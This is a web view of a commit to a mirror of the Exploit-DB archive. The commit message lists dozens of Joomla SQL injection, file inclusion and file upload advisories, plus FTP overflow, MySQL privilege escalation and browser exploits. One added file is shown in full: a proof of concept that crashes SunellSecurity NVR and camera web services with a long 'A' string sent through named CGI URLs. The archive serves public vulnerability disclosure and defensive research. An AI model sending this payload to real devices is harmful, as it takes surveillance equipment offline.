bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-11-03

Browse source 
15 new exploits

Joomla! Component PBBooking 1.0.4_3 - Multiple Blind SQL Injection
Joomla! Component 'com_pbbooking' 1.0.4_3 - Multiple Blind SQL Injection

Joomla! Component SimpleShop (com_SimpleShop) - SQL Injection
Joomla! Component 'com_SimpleShop' - SQL Injection

Joomla! Component Spielothek 1.6.9 - Multiple Blind SQL Injection
Joomla! Component 'com_spielothek' 1.6.9 - Multiple Blind SQL Injection

Joomla! Component CamelcityDB 2.2 - SQL Injection
Joomla! Component 'com_camelcitydb2' 2.2 - SQL Injection

Joomla! Component cgtestimonial 2.2 - Multiple Vulnerabilities
Joomla! Component 'com_cgtestimonial' 2.2 - Multiple Vulnerabilities

Joomla! Component com_neorecruit 1.4 - SQL Injection
Joomla! Component 'com_neorecruit' 1.4 - SQL Injection

Joomla! Component Teams - Multiple Blind SQL Injection
Joomla! Component 'com_teams' - Multiple Blind SQL Injection

Joomla! Component Yellowpages - SQL Injection
Joomla! Component 'com_yellowpages' - SQL Injection

Joomla! Component Amblog 1.0 - Multiple SQL Injections
Joomla! Component 'com_amblog' 1.0 - Multiple SQL Injections
Joomla! Component com_equipment - SQL Injection
Joomla! Component Jgrid 1.0 - Local File Inclusion
Joomla! Component OnGallery - SQL Injection
Joomla! Component 'com_equipment' - SQL Injection
Joomla! Component 'com_jgrid' 1.0 - Local File Inclusion
Joomla! Component 'com_ongallery' - SQL Injection
Joomla! Component com_Fabrik - SQL Injection
Joomla! Component com_extcalendar - Blind SQL Injection
Joomla! Component 'com_Fabrik' - SQL Injection
Joomla! Component 'com_extcalendar' - Blind SQL Injection
Joomla! Component com_zina - SQL Injection
Joomla! Component Biblioteca 1.0 Beta - Multiple SQL Injections
Joomla! Component 'com_zina' - SQL Injection
Joomla! Component 'com_biblioteca' 1.0 Beta - Multiple SQL Injections

Joomla! Component com_zoomportfolio - SQL Injection
Joomla! Component 'com_zoomportfolio' - SQL Injection

Joomla! Component com_remository - Arbitrary File Upload
Joomla! Component 'com_remository' - Arbitrary File Upload
Joomla! Component com_picsell - Local File Disclosure
Joomla! Component com_jefaqpro - Multiple Blind SQL Injection
Joomla! Component 'com_picsell' - Local File Disclosure
Joomla! Component 'com_jefaqpro' - Multiple Blind SQL Injection

Joomla! Component iJoomla! magazine 3.0.1 - Remote File Inclusion
Joomla! Component 'com_magazine' 3.0.1 - Remote File Inclusion
Joomla! Component Clantools 1.5 - Blind SQL Injection
Joomla! Component Clantools 1.2.3 - Multiple Blind SQL Injection
Joomla! Component 'com_clantools' 1.5 - Blind SQL Injection
Joomla! Component 'com_clantools' 1.2.3 - Multiple Blind SQL Injection

Joomla! Component Gantry Framework 3.0.10 - Blind SQL Injection
Joomla! Component 'com_gantry' 3.0.10 - Blind SQL Injection

Joomla! Component Aardvertiser 2.1 Free - Blind SQL Injection
Joomla! Component 'com_aardvertiser' 2.1 - Blind SQL Injection

Joomla! Component RSform! 1.0.5 - Multiple Vulnerabilities
Joomla! Component 'com_forme' 1.0.5 - Multiple Vulnerabilities

Joomla! Component com_jphone - Local File Inclusion
Joomla! Component 'com_jphone' - Local File Inclusion

Joomla! Component Mosets Tree 2.1.5 - Arbitrary File Upload
Joomla! Component 'com_mtree' 2.1.5 - Arbitrary File Upload

Joomla! Component com_jgen - SQL Injection
Joomla! Component 'com_jgen' - SQL Injection

Joomla! Component com_restaurantguide - Multiple Vulnerabilities
Joomla! Component 'com_restaurantguide' - Multiple Vulnerabilities

Joomla! Component com_elite_experts - SQL Injection
Joomla! Component 'com_elite_experts' - SQL Injection
Joomla! Component TimeTrack 1.2.4 - Multiple SQL Injection
Joomla! Component com_ezautos - SQL Injection
Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection
Joomla! Component 'com_ezautos' - SQL Injection

Joomla! Component je Guestbook 1.0 - Multiple Vulnerabilities
Joomla! Component 'com_jeguestbook' 1.0 - Multiple Vulnerabilities
Joomla! Component JE Job - SQL Injection
Joomla! Component JE Directory - SQL Injection
Joomla! Component 'com_jejob' - SQL Injection
Joomla! Component 'com_jedirectory' - SQL Injection

Joomla! Component Community Builder Enhenced (CBE) - Local File Inclusion / Remote Code Execution
Joomla! Component 'com_cbe' - Local File Inclusion / Remote Code Execution

Joomla! Component js Calendar 1.5.1 Joomla! - Multiple Vulnerabilities
Joomla! Component 'com_jscalendar' 1.5.1 - Multiple Vulnerabilities

Joomla! Component JE Ajax Event Calendar (com_jeajaxeventcalendar) - SQL Injection
Joomla! Component 'com_jeajaxeventcalendar' - SQL Injection

Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload
Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload
Joomla! Component Flip Wall (com_flipwall) - SQL Injection
Joomla! Component Sponsor Wall (com_sponsorwall) - SQL Injection
Joomla! Component 'com_flipwall' - SQL Injection
Joomla! Component 'com_sponsorwall' - SQL Injection

sweetrice CMS 0.6.7 - Multiple Vulnerabilities
SweetRice 0.6.7 - Multiple Vulnerabilities

Joomla! Component ccInvoices (com_ccinvoices) - SQL Injection
Joomla! Component 'com_ccinvoices' - SQL Injection
Joomla! Component com_connect - Local File Inclusion
Joomla! Component DCNews com_dcnews - Local File Inclusion
Joomla! Component 'com_connect' - Local File Inclusion
Joomla! Component 'com_dcnews' - Local File Inclusion
Joomla! Component com_ckforms - Local File Inclusion
Joomla! Component com_clan - SQL Injection
Joomla! Component 'com_ckforms' - Local File Inclusion
Joomla! Component 'com_clan' - SQL Injection

Joomla! Component com_clanlist - SQL Injection
Joomla! Component 'com_clanlist' - SQL Injection

Joomla! Component ProDesk 1.5 - Local File Inclusion
Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion

Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection
Joomla! Component 'com_jquarks4s' 1.0.0 - Blind SQL Injection
Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection
Joomla! Component com_markt - SQL Injection
Joomla! Component com_img - Local File Inclusion
Joomla! Component 'btg_oglas' - HTML / Cross-Site Scripting Injection
Joomla! Component 'com_markt' - SQL Injection
Joomla! Component 'com_img' - Local File Inclusion
Joomla! Component com_jsupport - Cross-Site Scripting
Joomla! Component com_jsupport - SQL Injection
Joomla! Component 'com_jsupport' - Cross-Site Scripting
Joomla! Component 'com_jsupport' - SQL Injection

Joomla! Component ccBoard 1.2-RC - Multiple Vulnerabilities
Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities

Joomla! Component com_alfurqan15x - SQL Injection
Joomla! Component 'com_alfurqan15x' - SQL Injection

Joomla! Component Maian Media (com_maianmedia) - SQL Injection
Joomla! Component 'com_maianmedia' - SQL Injection

Joomla! Component Template Mosets Tree 2.1.6 - Overwrite Cross-Site Request Forgery
Joomla! Component 'com_mtree' 2.1.6 - Overwrite Cross-Site Request Forgery

Joomla! Component com_jimtawl - Local File Inclusion
Joomla! Component 'com_jimtawl' - Local File Inclusion

Joomla! Component JE Auto 1.0 - SQL Injection
Joomla! Component 'com_jeauto' 1.0 - SQL Injection

Joomla! Component Billy Portfolio 1.1.2 - Blind SQL Injection
Joomla! Component 'com_billyportfolio' 1.1.2 - Blind SQL Injection

Joomla! Component JRadio (com_jradio) - Local File Inclusion
Joomla! Component 'com_jradio' - Local File Inclusion

Joomla! Component JE Auto (com_jeauto) - Local File Inclusion
Joomla! Component 'com_jeauto' - Local File Inclusion

Joomla! Component Jotloader 2.2.1 - Local File Inclusion
Joomla! Component 'com_jotloader' 2.2.1 - Local File Inclusion

Joomla! Component com_xgallery 1.0 - Local File Inclusion
Joomla! Component 'com_xgallery' 1.0 - Local File Inclusion
Joomla! Component com_ponygallery - Remote File Inclusion
Joomla! Component com_adsmanager - Remote File Inclusion
Joomla! Component 'com_ponygallery' - Remote File Inclusion
Joomla! Component 'com_adsmanager' - Remote File Inclusion

Joomla! Component com_xmovie 1.0 - Local File Inclusion
Joomla! Component 'com_xmovie' 1.0 - Local File Inclusion

Joomla! Component com_idoblog - SQL Injection
Joomla! Component 'com_idoblog' - SQL Injection

Joomla! Plugin Captcha 4.5.1 - Local File Disclosure
Joomla! Plugin 'Captcha' 4.5.1 - Local File Disclosure

Joomla! Component People 1.0.0 - SQL Injection
Joomla! Component 'com_people' 1.0.0 - SQL Injection

Joomla! Component People 1.0.0 - Local File Inclusion
Joomla! Component 'com_people' 1.0.0 - Local File Inclusion

Joomla! Component allCineVid 1.0.0 - Blind SQL Injection
Joomla! Component 'com_allcinevid' 1.0.0 - Blind SQL Injection

Joomla! Component B2 Portfolio 1.0.0 - Multiple SQL Injections
Joomla! Component 'com_b2portfolio' 1.0.0 - Multiple SQL Injections

Joomla! Component XCloner (com_xcloner-backupandrestore) - Remote Command Execution
Joomla! Component 'com_xcloner-backupandrestore' - Remote Command Execution

Joomla! Component com_booklibrary - SQL Injection
Joomla! Component 'com_booklibrary' - SQL Injection

Joomla! Component com_virtuemart 1.1.7 - Blind SQL Injection
Joomla! Component 'com_virtuemart' 1.1.7 - Blind SQL Injection

Joomla! Component JCE (com_jce) - Blind SQL Injection
Joomla! Component 'com_jce' - Blind SQL Injection
Joomla! Component com_versioning - SQL Injection
Joomla! Component com_hello - SQL Injection
Joomla! Component 'com_versioning' - SQL Injection
Joomla! Component 'com_hello' - SQL Injection

Joomla! Component com_question - SQL Injection
Joomla! Component 'com_question' - SQL Injection

Joomla! Component 1.0 jDownloads - Arbitrary File Upload
Joomla! Component 1.0 'com_jdownloads' - Arbitrary File Upload

Joomla! Component com_jmsfileseller - Local File Inclusion
Joomla! Component 'com_jmsfileseller' - Local File Inclusion

Joomla! Component com_joomnik - SQL Injection
Joomla! Component 'com_joomnik' - SQL Injection

Joomla! Plugin Scriptegrator 1.5 - File Inclusion
Joomla! Component 'Scriptegrator' 1.5 - File Inclusion
Joomla! Component A Cool Debate 1.0.3 - Local File Inclusion
Joomla! Component com_team - SQL Injection
Joomla! Component 'com_acooldebate' 1.0.3 - Local File Inclusion
Joomla! Component 'com_team' - SQL Injection

Joomla! Component Calc Builder - 'id' Blind SQL Injection
Joomla! Component 'com_calcbuilder' - 'id' Parameter Blind SQL Injection

Joomla! Component JoomlaXi - Persistent Cross-Site Scripting
Joomla! Component 'JoomlaXi' - Persistent Cross-Site Scripting

Joomla! Component mdigg - SQL Injection
Joomla! Component 'mdigg' - SQL Injection

Joomla! Component Xmap 1.2.11 - Blind SQL Injection
Joomla! Component 'com_xmap' 1.2.11 - Blind SQL Injection

Joomla! Component SOBI2 2.9.3.2 - Blind SQL Injections
Joomla! Component 'com_sobi2' 2.9.3.2 - Blind SQL Injections

Joomla! Component Appointment Booking Pro - Local File Inclusion
Joomla! Component 'com_rsappt_pro2' - Local File Inclusion

Joomla! Component JE K2 Story Submit - Local File Inclusion
Joomla! Component 'com_jesubmit' - Local File Inclusion

Joomla! Component mod_spo - SQL Injection
Joomla! Component 'mod_spo' - SQL Injection

Joomla! Component com_virtuemart 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit)
Joomla! Component 'com_virtuemart' 1.5 / 1.1.7 - Blind Time-Based SQL Injection (Metasploit)

Joomla! Component com_obSuggest - Local File Inclusion
Joomla! Component 'com_obSuggest' - Local File Inclusion

Joomla! Component com_jdirectory - SQL Injection
Joomla! Component 'com_jdirectory' - SQL Injection

Joomla! Component TNR Enhanced Joomla! Search - SQL Injection
Joomla! Component 'com_esearch' - SQL Injection

Joomla! Component JoomTouch - Local File Inclusion
Joomla! Component 'com_joomtouch' - Local File Inclusion

Joomla! Extension JCE 2.0.10 - Multiple Vulnerabilities
Joomla! Component 'com_jce' 2.0.10 - Multiple Vulnerabilities

Joomla! Component simple file lister module 1.0 - Directory Traversal
Joomla! Component 'mod_simpleFileLister' 1.0 - Directory Traversal

Joomla! Component YJ Contact us - Local File Inclusion
Joomla! Component 'com_yjcontactus' - Local File Inclusion

Joomla! Component Time Returns (com_timereturns) 2.0 - SQL Injection
Joomla! Component 'com_timereturns' 2.0 - SQL Injection

Joomla! Component Techfolio 1.0 - SQL Injection
Joomla! Component 'com_techfolio' 1.0 - SQL Injection
Joomla! Component JEEMA Sms 3.2 - Multiple Vulnerabilities
Joomla! Component Vik Real Estate 1.0 - Multiple Vulnerabilities
Joomla! Component 'com_jeemasms' 3.2 - Multiple Vulnerabilities
Joomla! Component 'com_vikrealestate' 1.0 - Multiple Vulnerabilities

Joomla! Component HM-Community com_hmcommunity - Multiple Vulnerabilities
Joomla! Component 'com_hmcommunity' - Multiple Vulnerabilities

Joomla! Component Alameda (com_alameda) 1.0 - SQL Injection
Joomla! Component 'com_alameda' 1.0 - SQL Injection

Joomla! Component Jobprofile (com_jobprofile) - SQL Injection
Joomla! Component 'com_jobprofile' - SQL Injection

Joomla! Component QContacts 1.0.6 - SQL Injection
Joomla! Component 'com_qcontacts' 1.0.6 - SQL Injection

Joomla! Component com_dshop - SQL Injection
Joomla! Component 'com_dshop' - SQL Injection

Joomla! Component Discussions (com_discussions) - SQL Injection
Joomla! Component 'com_discussions' - SQL Injection
Joomla! Component The Estate Agent (com_estateagent) - SQL Injection
Joomla! Component com_bearleague - SQL Injection
Joomla! Component 'com_estateagent' - SQL Injection
Joomla! Component 'com_bearleague' - SQL Injection

Joomla! Component com_ponygallery - SQL Injection
Joomla! Component 'com_ponygallery' - SQL Injection

Joomla! Component com_jigsaw - 'Controller' Parameter Directory Traversal
Joomla! Component 'com_jigsaw' - 'Controller' Parameter Directory Traversal

Joomla! Component com_weblinks - 'Itemid' Parameter SQL Injection
Joomla! Component 'com_weblinks' - 'Itemid' Parameter SQL Injection

Joomla! Component com_fireboard - 'Itemid' Parameter SQL Injection
Joomla! Component 'com_fireboard' - 'Itemid' Parameter SQL Injection

Joomla! Component com_dirfrm - Multiple SQL Injections
Joomla! Component 'com_dirfrm' - Multiple SQL Injections

Joomla! Component Spain - 'nv' Parameter SQL Injection
Joomla! Component 'com_spain' - 'nv' Parameter SQL Injection

Joomla! Component com_tax - 'eid' Parameter SQL Injection
Joomla! Component 'com_tax' - 'eid' Parameter SQL Injection

Joomla! Component Club Manager - 'cm_id' Parameter SQL Injection
Joomla! Component 'com_clubmanager' - 'cm_id' Parameter SQL Injection

Joomla! / Mambo Component com_trade - 'PID' Parameter Cross-Site Scripting
Joomla! / Mambo Component 'com_trade' - 'PID' Parameter Cross-Site Scripting

Joomla! Component com_jstore - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_jstore' - 'Controller' Parameter Local File Inclusion

Joomla! Component Catalogue - SQL Injection / Local File Inclusion
Joomla! Component 'com_catalogue' - SQL Injection / Local File Inclusion

Joomla! Component AutoArticles 3000 - 'id' Parameter SQL Injection
Joomla! Component 'com_a3000' - 'id' Parameter SQL Injection

Joomla! Component Store Directory - 'id' Parameter SQL Injection
Joomla! Component 'com_storedirectory' - 'id' Parameter SQL Injection

Joomla! Component Annuaire - 'id' Parameter SQL Injection
Joomla! Component 'com_annuaire' - 'id' Parameter SQL Injection
Joomla! Component Jeformcr - 'id' Parameter SQL Injection
Joomla! Component JExtensions Property Finder - 'sf_id' Parameter SQL Injection
Joomla! Component 'com_jeformcr' - 'id' Parameter SQL Injection
Joomla! Component 'com_jesectionfinder' - 'sf_id' Parameter SQL Injection
Joomla! Component com_mailto - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component Redirect 'com_redirect' 1.5.19 - Local File Inclusion
Joomla! Component 'com_mailto' - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component 'com_redirect' 1.5.19 - Local File Inclusion

Joomla! Component Classified - SQL Injection
Joomla! Component 'com_classified' - SQL Injection

Joomla! Component com_frontenduseraccess - Local File Inclusion
Joomla! Component 'com_frontenduseraccess' - Local File Inclusion

Joomla! Component VirtueMart eCommerce 1.1.6 - SQL Injection
Joomla! Component 'com_virtuemart' 1.1.6 - SQL Injection

Joomla! Component com_clan_members - 'id' Parameter SQL Injection
Joomla! Component 'com_clan_members' - 'id' Parameter SQL Injection

Joomla! Component com_phocadownload - Local File Inclusion
Joomla! Component 'com_phocadownload' - Local File Inclusion

Joomla! Component com_cbcontact - 'contact_id' Parameter SQL Injection
Joomla! Component 'com_cbcontact' - 'contact_id' Parameter SQL Injection

Joomla! Component com_maplocator - 'cid' Parameter SQL Injection
Joomla! Component 'com_maplocator' - 'cid' Parameter SQL Injection

Joomla! Component com_shop - SQL Injection
Joomla! Component 'com_shop' - SQL Injection
Joomla! Component Virtual Money 'com_virtualmoney' 1.5 - SQL Injection
Joomla! Component CCBoard - SQL Injection / Arbitrary File Upload
Joomla! Component 'com_virtualmoney' 1.5 - SQL Injection
Joomla! Component 'com_ccboard' - SQL Injection / Arbitrary File Upload

Joomla! Component com_morfeoshow - 'idm' Parameter SQL Injection
Joomla! Component 'com_morfeoshow' - 'idm' Parameter SQL Injection

Joomla! Component com_jr_tfb - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_jr_tfb' - 'Controller' Parameter Local File Inclusion

Joomla! Component com_voj - SQL Injection
Joomla! Component 'com_voj' - SQL Injection

Joomla! Component Foto - 'id_categoria' Parameter SQL Injection
Joomla! Component 'com_foto' - 'id_categoria' Parameter SQL Injection
Joomla! Component Juicy Gallery - 'picId' Parameter SQL Injection
Joomla! Component com_hospital - SQL Injection
Joomla! Component Controller - 'Itemid' Parameter SQL Injection
Joomla! Component 'com_juicy' - 'picId' Parameter SQL Injection
Joomla! Component 'com_hospital' - SQL Injection
Joomla! Component 'com_controller' - 'Itemid' Parameter SQL Injection

Joomla! Component com_resman - Cross-Site Scripting
Joomla! Component com_newssearch - SQL Injection
Joomla! Component 'com_newssearch' - SQL Injection

Joomla! Component Slideshow Gallery - 'id' Parameter SQL Injection
Joomla! Component 'com_xeslidegalfx' - 'id' Parameter SQL Injection

Joomla! Component com_community - 'userid' Parameter SQL Injection
Joomla! Component 'com_community' - 'userid' Parameter SQL Injection

Joomla! Component com_biitatemplateshop - 'groups' Parameter SQL Injection
Joomla! Component 'com_biitatemplateshop' - 'groups' Parameter SQL Injection

Joomla! Component com_expedition - 'id' Parameter SQL Injection
Joomla! Component 'com_expedition' - 'id' Parameter SQL Injection
Joomla! Component com_tree - 'key' Parameter SQL Injection
Joomla! Component com_br - 'state_id' Parameter SQL Injection
Joomla! Component com_shop - 'id' Parameter SQL Injection
Joomla! Component 'com_tree' - 'key' Parameter SQL Injection
Joomla! Component 'com_br' - 'state_id' Parameter SQL Injection
Joomla! Component 'com_shop' - 'id' Parameter SQL Injection

Joomla! Component Sgicatalog 1.0 - 'id' Parameter SQL Injection
Joomla! Component 'com_sgicatalog' 1.0 - 'id' Parameter SQL Injection

Joomla! Extension com_alfcontact 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities
Joomla! Component 'com_alfcontact' 1.9.3 - Multiple Cross-Site Scripting Vulnerabilities

Joomla! Component Content - 'year' Parameter SQL Injection
Joomla! Component 'com_content' - 'year' Parameter SQL Injection

Joomla! Component com_tsonymf - 'idofitem' Parameter SQL Injection
Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection

Joomla! Component com_caproductprices - 'id' Parameter SQL Injection
Joomla! Component 'com_caproductprices' - 'id' Parameter SQL Injection

Joomla! Component HD Video Share 1.3 - 'id' Parameter SQL Injection
Joomla! Component 'com_contushdvideoshare' 1.3 - 'id' Parameter SQL Injection

Joomla! Component com_br - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_br' - 'Controller' Parameter Local File Inclusion
Joomla! Component Full 'com_full' - 'id' Parameter SQL Injection
Joomla! Component com_sanpham - Multiple SQL Injections
Joomla! Component com_xball - 'team_id' Parameter SQL Injection
Joomla! Component com_boss - 'Controller' Parameter Local File Inclusion
Joomla! Component com_car - Multiple SQL Injections
Joomla! Component com_some - 'Controller' Parameter Local File Inclusion
Joomla! Component com_bulkenquery - 'Controller' Parameter Local File Inclusion
Joomla! Component com_kp - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_full' - 'id' Parameter SQL Injection
Joomla! Component 'com_sanpham' - Multiple SQL Injections
Joomla! Component 'com_xball' - 'team_id' Parameter SQL Injection
Joomla! Component 'com_boss' - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_car' - Multiple SQL Injections
Joomla! Component 'com_some' - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_bulkenquery' - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_kp' - 'Controller' Parameter Local File Inclusion

Joomla! Component com_jesubmit - 'index.php' Arbitrary File Upload
Joomla! Component 'com_jesubmit' - 'index.php' Arbitrary File Upload
Joomla! Component com_motor - 'cid' Parameter SQL Injection
Joomla! Component com_products - Multiple SQL Injections
Joomla! Component 'com_motor' - 'cid' Parameter SQL Injection
Joomla! Component 'com_products' - Multiple SQL Injections
Joomla! Component com_visa - Local File Inclusion / SQL Injection
Joomla! Component com_firmy - 'Id' Parameter SQL Injection
Joomla! Component 'com_visa' - Local File Inclusion / SQL Injection
Joomla! Component 'com_firmy' - 'Id' Parameter SQL Injection
Joomla! Component com_crhotels - 'catid' Parameter SQL Injection
Joomla! Component com_propertylab - 'id' Parameter SQL Injection
Joomla! Component 'com_crhotels' - 'catid' Parameter SQL Injection
Joomla! Component 'com_propertylab' - 'id' Parameter SQL Injection

Joomla! Component com_bbs - Multiple SQL Injections
Joomla! Component 'com_bbs' - Multiple SQL Injections

Joomla! Component com_cmotour - 'id' Parameter SQL Injection
Joomla! Component 'com_cmotour' - 'id' Parameter SQL Injection

Joomla! Component com_bnf - 'seccion_id' Parameter SQL Injection
Joomla! Component 'com_bnf' - 'seccion_id' Parameter SQL Injection

Joomla! Component Currency Converter - 'from' Parameter Cross-Site Scripting
Joomla! Component 'mod_currencyconverter' - 'from' Parameter Cross-Site Scripting
Joomla! Component X-Shop - 'idd' Parameter SQL Injection
Joomla! Component Xcomp 'com_xcomp' - Local File Inclusion
Joomla! Component 'com_x-shop' - 'idd' Parameter SQL Injection
Joomla! Component 'com_xcomp' - Local File Inclusion

Joomla! Component com_xvs - 'Controller' Parameter Local File Inclusion
Joomla! Component 'com_xvs' - 'Controller' Parameter Local File Inclusion

Joomla! Component Machine - Multiple SQL Injections
Joomla! Component 'com_machine' - Multiple SQL Injections
Joomla! Component CCNewsLetter Module 1.0.7 - 'id' Parameter SQL Injection
Joomla! Component Video Gallery - Local File Inclusion / SQL Injection
Joomla! Component 'mod_ccnewsletter' 1.0.7 - 'id' Parameter SQL Injection
Joomla! Component 'com_videogallery' - Local File Inclusion / SQL Injection
Joomla! Component Alphacontent - 'limitstart' Parameter SQL Injection
Joomla! Component Joomsport - SQL Injection / Arbitrary File Upload
Joomla! Component 'com_alphacontent' - 'limitstart' Parameter SQL Injection
Joomla! Component 'com_joomsport' - SQL Injection / Arbitrary File Upload
Joomla! Component Simple SWFupload - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component Art Uploader - 'upload.php' Arbitrary File Upload
Joomla! Component DentroVideo - 'upload.php' Arbitrary File Upload
Joomla! Component 'com_simpleswfupload' - 'uploadhandler.php' Arbitrary File Upload
Joomla! Component 'mod_artuploader' - 'upload.php' Arbitrary File Upload
Joomla! Component 'com_dv' - 'upload.php' Arbitrary File Upload

PCMAN FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)
PCMan FTP Server 2.0.7 - 'ls' Command Buffer Overflow (Metasploit)

PCMAN FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow
PCMan FTP Server 2.0.7 - 'DELETE' Command Buffer Overflow
MySQL / MariaDB / PerconaDB - 'mysql' System User Privilege Escalation / Race Condition
MySQL / MariaDB / PerconaDB - 'root' Privilege Escalation
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition
PCMan FTP Server 2.0.7 - 'UMASK' Command Buffer Overflow
Freefloat FTP Server 1.0 - 'DIR' Command Buffer Overflow
Alienvault OSSIM/USM 5.3.1 - PHP Object Injection
Alienvault OSSIM/USM 5.3.1 - Persistent Cross-Site Scripting
Alienvault OSSIM/USM 5.3.1 - SQL Injection
Microsoft Internet Explorer 9 - MSHTML CAttrArray Use-After-Free (MS14-056)
Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass
SunellSecurity NVR / Camera - Denial Of Service
Linux Kernel (Ubuntu / Fedora / Redhat) - 'Overlayfs' Privilege Escalation (Metasploit)
MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation
Bassmaster 1.5.1 - Batch Arbitrary JavaScript Injection Remote Code Execution (Metasploit)
LifeSize Room 5.0.9 - Multiple Vulnerabilities
Microsoft Internet Explorer 11 - MSHTML CView::CalculateImageImmunity Use-After-Free
SweetRice 1.5.1 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2016-11-03 05:01:18 +00:00
parent c76e893f94
commit 1f59ca27c2
20 changed files with 1665 additions and 1507 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

416
files.csv
View file

File diff suppressed because it is too large Load diff

28
platforms/hardware/dos/40687.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: SunellSecurity NVR / Cams - Buffer overflow in CGI
# Date: 11.2.2016
# Exploit Author: qwsj
# Vendor Homepage: https://github.com/qwsj
# Version: 1.6.08-09 / 2.0.06-08
# Tested on: Windows / Linux
Bug in CGI scrypt's for develop.
Web service buffer overflow and leading to a stop web service, and the device rebooted.
Symbols (1072): -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# For NVR:
Version firmware:
1.6.0902.0000.3.0.29.0.0
1.6.0802.0000.0.0.2906.1.0
Use link: http://IP/cgi-bin/videoStream.cgi?userName=
# For Cams:
Version firmware:
2.0.0601.1002.3.0.56.0.1_TD
2.0.0801.1002.1.1.125.0.0
2.0.0601.1002.3.0.33.0.12
Use link: http://IP/cgi-bin/image.cgi?userName=
